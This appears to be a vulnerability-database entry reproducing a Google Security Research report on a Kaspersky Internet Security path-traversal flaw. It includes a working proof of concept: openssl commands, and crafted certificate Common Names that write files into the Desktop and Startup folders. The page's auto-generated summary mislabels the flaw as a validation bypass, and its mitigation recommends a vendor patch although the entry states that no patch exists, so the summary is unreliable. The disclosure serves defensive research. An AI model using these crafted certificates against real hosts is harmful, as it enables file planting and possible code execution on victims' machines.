Certificate Validation Bypass via Malicious Certificate Name

vendor:

Kaspersky Internet Security

by:

Google Security Research

7.5

CVSS

HIGH

Certificate Validation Bypass

352

CWE

Product Name: Kaspersky Internet Security

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

Certificate Validation Bypass via Malicious Certificate Name

When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. The naming pattern of these certificates is {CN}.cer. By creating a malicious certificate with a specially crafted Common Name (CN), an attacker can bypass certificate validation and potentially execute arbitrary code. The attacker can generate a certificate using OpenSSL and then start a server to serve the malicious certificate. When a Windows host with Kaspersky installed navigates to the server, Kaspersky will create a certificate with the specified name on the desktop, allowing the attacker to potentially execute code.

Mitigation:

Apply the patch provided by the vendor. Disable Kaspersky https inspection if not required. Ensure that the Common Name (CN) of certificates does not allow arbitrary code execution.

Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=539

When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.

I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.

Here is how to generate a certificate to reproduce:

$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:

Then test start a server like this:

$ openssl s_server -key key.pem -cert cert.pem -accept 8080

And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file.